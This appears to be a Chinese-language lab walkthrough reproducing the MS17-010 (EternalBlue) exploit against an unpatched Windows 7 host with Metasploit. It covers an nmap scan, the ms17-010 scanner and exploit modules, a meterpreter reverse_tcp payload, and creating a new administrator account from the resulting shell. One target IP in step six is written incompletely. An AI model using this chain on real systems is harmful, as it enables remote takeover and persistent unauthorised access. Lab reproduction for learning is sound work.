MS17-010漏洞复现
环境配置:windows 7 (IP:192.168.228.136/24)
攻击机:kali-Linux-2022.3(IP:192.168.228.132/24)
kali-Linux-2022.3和Windows 7能够相互ping通,Windows 7靶机关闭防火墙,开启445端口(默认端口开启),Windows 7靶机不要打补丁
第一步:使用nmap命令扫描网络,查看同一网络中是否具有可攻击的主机及端口:nmap 192.168.228.0/24
第二步:攻击机和靶机必须处于同一网络,我们可知攻击机IP:192.168.228.132,靶机IP:192.168.228.136
使用msfconsole进入控制台
第三步:搜索MS17-010漏洞
第四步:利用auxiliary模块扫描ms17-010漏洞,查看并设置靶机IP
use 3
show options
set rhosts 192.168.228.136
第五步:进入exploit模块后,使用payload模块,将攻击靶机的程序装载进入即将进行的攻击中,
use 0
set payload windows/x64/meterpreter/reverse_tcp
第六步:设置靶机IP:set rhosts 192.168.136,使用run命令进行攻击,当出现下图是即成功
第七步:输入shell命令,打开靶机的cmd界面,输入chcp 65001解决乱码问题,创建新用户,并添加至管理员组,取得最高权限